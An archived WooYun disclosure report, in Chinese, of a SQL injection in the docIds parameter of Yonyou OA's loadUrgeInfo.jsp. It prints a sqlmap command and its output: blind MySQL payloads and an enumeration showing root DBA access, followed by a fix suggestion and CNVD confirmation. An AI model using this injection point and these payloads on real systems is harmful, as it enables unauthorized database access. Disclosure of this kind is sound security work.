乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-24: 细节已通知厂商并且等待厂商处理中 2015-12-28: 厂商已经确认,细节仅向厂商公开 2016-01-07: 细节向核心白帽子及相关领域专家公开 2016-01-17: 细节向普通白帽子公开 2016-01-27: 细节向实习白帽子公开 2016-02-09: 细节向公众公开
SQL注入漏洞
注入点(用友OA系统):http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1
python sqlmap.py -u http://**.**.**.**:8080/yyoa/docMgr/superviseAndUrge/loadUrgeInfo.jsp?docIds=1 --thread 10 --dbms mysql --current-user --current-db --is-dbaParameter: docIds (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: docIds=1 RLIKE (SELECT (CASE WHEN (8219=8219) THEN 1 ELSE 0x28 END)) Type: AND/OR time-based blind Title: MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query) Payload: docIds=1,(SELECT (CASE WHEN (7121=7121) THEN (SELECT BENCHMARK(5000000,MD5(0x52634942))) ELSE 7121*(SELECT 7121 FROM mysql.db) END))---back-end DBMS: MySQL >= 5.0.0current user: 'root@localhost'current database: 'mysql3235'current user is DBA: Truesqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: docIds (GET) Type: boolean-based blind Title: MySQL boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause (RLIKE) Payload: docIds=1 RLIKE (SELECT (CASE WHEN (8219=8219) THEN 1 ELSE 0x28 END)) Type: AND/OR time-based blind Title: MySQL < 5.0.12 time-based blind - GROUP BY and ORDER BY clauses (heavy query) Payload: docIds=1,(SELECT (CASE WHEN (7121=7121) THEN (SELECT BENCHMARK(5000000,MD5(0x52634942))) ELSE 7121*(SELECT 7121 FROM mysql.db) END))---back-end DBMS: MySQL >= 5.0.0current user: 'root@localhost'current database: 'mysql3235'current user is DBA: Trueavailable databases [4]:[*] information_schema[*] mysql[*] mysql3235[*] temp
过滤,升级系统。请及时修复。
危害等级:高
漏洞Rank:10
确认时间:2015-12-28 17:50
CNVD确认并复现所述情况,已经转由CNCERT下发给山东分中心,由其后续协调网站管理单位处置.
暂无